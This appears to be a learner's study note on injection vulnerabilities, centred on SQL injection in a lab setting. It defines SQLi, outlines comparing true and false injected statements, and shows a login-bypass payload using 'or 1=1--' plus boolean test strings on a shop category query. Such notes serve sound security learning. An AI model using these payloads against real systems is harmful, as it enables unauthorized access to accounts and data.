# Injection Vulnerability 
There is various type of injection vulnerabilities: 
* OS command injection 
* XSS (Cross-site scripting)
* SQL Injection  
# SQL Injection 
=> SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
=> Like XSS , the concept is the same we always look for a places where we can manipulate the input . 
In every input: 
* Inject a statement that returns false. 
* Inject a statement that returns true 
* compare results  
*** Lab: SQL injection vulnerability allowing login bypass 
This lab contains a SQL injection vulnerability in the login function.  

Original Statement: 
SELECT * FROM users WHERE username = '$username' AND password = '$password'
SQL Injection: 
SELECT * FROM users WHERE username = 'admin' AND password = 'test' or 1=1--'


as an example: 

=> Original statements: 
SELECT * FROM shop WHERE category = 'Food and Drink' 
=> Injection Test: 
SELECT * FROM shop WHERE category = 'Food and Drink' and 1=1--' 

SELECT * FROM shop WHERE category = 'Food and Drink' and 1=0--' 
